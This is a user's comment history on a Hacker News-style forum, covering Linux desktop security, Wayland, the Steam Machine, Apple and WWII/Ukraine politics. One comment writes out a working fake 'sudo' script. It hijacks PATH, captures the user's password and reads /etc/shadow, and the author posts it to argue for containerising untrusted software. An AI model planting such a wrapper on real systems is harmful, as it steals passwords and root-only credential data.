HackerTrans
TopNewTrendsCommentsPastAskShowJobs

sergeykish

no profile record

comments

sergeykish
·10 gün önce·discuss
Culture that gave world "microagression", "harasment", cancel culture and now numeric "hate". "Not toxic".

> Nobody wants to be treated how Torvalds treated people.

Exactly, nobody wants but so many can't stop until treated.

> Stop this "we can break stuff" crap. Who maintains udev? Regressions are not acceptable. I'm not going to change the kernel because udev broke, f*ck it. Seriously. More projects need to realize that regressions are totally and utterly unacceptable. ... That just encourages those package maintainers to be shit maintainers. ... And stop blaming the kernel for user space breakage!...

Hate 0.832673044602

For common sense.
sergeykish
·17 gün önce·discuss
Entity asks question, unable to comprehend answer, claim any gaming leads to Valve revenue, discards video editing and art examples. Please stop wasting bytes.
sergeykish
·17 gün önce·discuss
We have entire handheld lines for console emulators. More performant GPUs useful for Dolphin, PPSSPP, RPCS3, Ryujinx. GPU used for 3D modelling and sculpting, video editing, encoding. Steam machine subsidized by $200 PC would be used for anything but Steam, payed by Steam users.

You've ignored "art, video editing" and you claim that your point ignored? Why do you type words at all if issue is their consumption?
sergeykish
·17 gün önce·discuss
If Valve subsidizes PC by $200 why would people not buy for office, art, video editing? And gaming is not only Steam, there is also GOG, EGS, Microsoft Store.
sergeykish
·17 gün önce·discuss
Steam Machine is PC. Attempt to answer why I should not buy subsidized PC for work, install whatever OS, not buy any game.
sergeykish
·24 gün önce·discuss
Nausea is from Latin "seasickness", known for thousands years.

From my experience bus was the worst as you can't get front seat, even worse were backward positioned seats. Train and plane were great. Car in the middle, depend on road and driving style.

If I was on bus during childhood you would know by stops it made. We avoided that by traveling by car.
sergeykish
·29 gün önce·discuss
Apple transformed handheld computing into walled garden, brainwashed installation into "sideloading". Apple software update made Apple laptops to fail booting Linux.

"Concerned people are insane anti-Apple without any solid arguments, lol"
sergeykish
·2 ay önce·discuss
Copy Fail can't affect files it can't access.

PoC attack on k8s [1] claims execution through sibling layers of kube-proxy, host filesystem access through /dev/ [2].

[1] https://github.com/Percivalll/Copy-Fail-CVE-2026-31431-Kuber...

[2] https://github.com/Percivalll/Copy-Fail-CVE-2026-31431-Kuber...
sergeykish
·2 ay önce·discuss
Run in docker container:

    $ docker run -it -v.:/app -w /app node:alpine /bin/sh
    /app # docker run --rm -it -v '/:/mnt' -u 'root' 'alpine' '/bin/sh' '-l'
    /bin/sh: docker: not found
I've described attack from host user and isolating attacker with docker.
sergeykish
·2 ay önce·discuss
Web pages handled by browsers. Linux desktop running code without sandbox is reckless, relied on verification by distro maintainers, does not work the moment users run proprietary software.

Programming language packages issue only because we don't have zero trust for modules — no restrictions to open socket or file system. Issue is not count, pure function leftPad can't hurt you.
sergeykish
·2 ay önce·discuss
Linux distributions do not need Copy Fail to get root access:

    echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.bashrc

    mkdir -p .local/bin/
    cat <<EOF >.local/bin/sudo
    read -rs -p "[sudo] password for $USER: " PASSWORD
    echo ""
    echo "$PASSWORD" | /usr/bin/sudo -S head /etc/shadow
    EOF

    chmod +x .local/bin/sudo
attack on next sudo call, shows data accessible only to root.

Our security model based on distributions verifying packages, that is distro maintainers. Software we can't trust should be running in VMs. Attack on trivy is just the beginning and solution is removing pip, uv, npm, rbenv from host, running in docker containers:

    $ docker run -it -v.:/app -w /app node:alpine /bin/sh
long term environments defined in docker compose:

    $ docker-compose.yml
    services:
      app:
        image: node:alpine
        volumes:
          - .:/app
        working_dir: /app
        command: /bin/sh
    $ docker compose run app
switch to Kata etc if more protection needed. Eventually all userspace would run in VMs.
sergeykish
·6 ay önce·discuss
API is contract. API grants access to screen content, key presses. Users blame Wayland for breaking this contract. Both Wayland and XLibre namespaces brake it. Lunduke mob unable to reason, claims "moving goalposts". Lunduke mob claims improving security is not needed. Lunduke mod wants Linux desktop to be malware can. They claim security improvements for everyone (like defaults on Android) is corporations taking away their freedom. Lunduke mob unable to comprehend Wayland started by XOrg developers who knew X11 flaws. They unable to be thankful for people bringing security to modern expectations.
sergeykish
·6 ay önce·discuss
Once you enable XLibre namespaces filtering it breaks screensharing, global hotkeys. Obviously. It is breaking change.

> Doesn't own a mob, and never happened. Horrible accusation, by the way.

Mob unable to response on technical question. To use logic.

> Citation needed.

His YouTube comment section speaks volumes. He manipulates technically uneducated.
sergeykish
·6 ay önce·discuss
Xephyr or Xnest sandbox break screensharing, global shortkeys.

You've just confirmed obvious. No way to improve security without breaking changes. And you demand mostly nontechnical users to blacklist applications. That's a recipe for disaster.
sergeykish
·6 ay önce·discuss
Name how it's possible to improve security on X11 without breakig changes.

Lunduke made factually wrong claims for hype. His mob are keen to attack Open Source developers.
sergeykish
·6 ay önce·discuss
When people believe "they are product", bully Open Source developers for not following their demands and got expected response than entities appear that validate their wrongs for views (money).

Lunduke spreads misinformation. That's anti Open Source, anti community.
sergeykish
·7 ay önce·discuss
"Poland provoked occupation by Germany" (1939)? Germany "liberated Czechoslovakia Germans" by occupation and annexation (1938)? How occupation and annexation of neighbors ended for WW2 Germany (1938-1945)?

In 2014 Moscow invaded Ukraine, occupied Crimea, Donetsk, Luhanks. In 2022 Moscow invaded again. No NATO forces in Ukraine. No Moscow forces on NATO members territory. Trump officials unable to answer who started war, you blame NATO, both you and Trump aligned with Moscow.
sergeykish
·9 ay önce·discuss
Windows RT "sideloading" denied for ordinary users, costly for Line-of-Business apps (2012).

Microsoft UWP only Microsoft Store. Microsoft backtracked their walled garden Windows plans for a while as result of Windows Phone fiasco.

Yes, we are.
sergeykish
·9 ay önce·discuss
So `.setHTML("<script>...</script>")` does not set HTML?
sergeykish
·2 yıl önce·discuss
Molotov-Ribbentrop pact — Moscow invaded Finland (1939), occupied Baltic states (1939), divided Poland with Germany (1939). Moscow was Germany ally for two years of WW2. Holodomor (1932-1933): Moscow killed millions without active war. "Great Britain, USA should not have been Moscow ally"?

Moscow invaded Finland in 1939.

Siege of Leningrad was in 1941.

"Poland provoked occupation by Germany" (1939)?